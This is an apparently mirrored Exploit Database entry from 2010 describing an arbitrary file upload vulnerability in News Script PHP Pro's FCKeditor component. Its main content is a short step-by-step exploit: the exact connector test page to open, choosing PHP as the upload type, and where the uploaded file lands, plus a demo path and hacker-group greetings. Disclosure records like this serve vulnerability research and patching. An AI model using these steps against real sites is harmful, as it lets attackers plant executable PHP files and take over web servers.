News Script PHP Pro – ‘FCKeditor’ Arbitrary File Upload

• Exploit Database
• 13 阅读

• 作者： Net.Edit0r
  日期： 2010-12-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15843/

• 
  ==============================================================================
  
  [»] News Script PHP Pro (fckeditor) File Upload Vulnerability
  
  ==============================================================================
  
  [»] Title : [ News Script PHP Pro (fckeditor) File Upload Vulnerability ]
  
  [»] Script: [ News Script PHP Pro]
  
  [»] TestedON: [ linux/php ]
  
  [»] Download: [ http://newsscriptphp.com/ ]
  
  [»] Author: [ Net.Edit0r }
  
  [»] Email : [ black.hat.tm@gmail.com ]
  
  [»] Date: [ 2010-12-26 ]
   
  [»] Version : [ Full Version ]
  
  [»] CVE : [Web Applications]
  
  ###########################################################################
  
   
  ===[ Exploit ]===./Iranian HackerZ
  
  [»] http://server/[patch]/fckeditor/editor/filemanager/connectors/uploadtest.html
  
  [»] Select the "File Upload" To use = php
   
  ===[ Upload To ]===
   
  [»] http://server/[patch]/userfiles/Name File
   
  ===[ Demo ]===
  
  [»] http://server/news/fckeditor/editor/filemanager/connectors/uploadtest.html
   
  Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , M4hd1 , Ali.Erroor 
   
   BHG : Net.Edit0r ~ Darkcoder ~ keracker
   
  ###########################################################################